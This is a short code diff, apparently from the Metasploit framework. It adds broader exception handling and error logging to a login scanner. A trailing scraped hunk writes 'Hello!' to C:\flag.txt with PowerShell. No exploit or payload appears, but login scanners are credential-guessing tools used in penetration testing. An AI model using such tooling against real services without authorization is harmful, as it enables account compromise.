              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
            end
-          rescue ::Rex::ConnectionError
+          rescue ::Rex::ConnectionError => e
            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            result_options[:proof] = e
+          rescue => e
+            elog(e)
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            result_options[:proof] = e
          end

          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1,2 @@`
				`$someText = "Hello!" ; $someText > "C:\flag.txt"`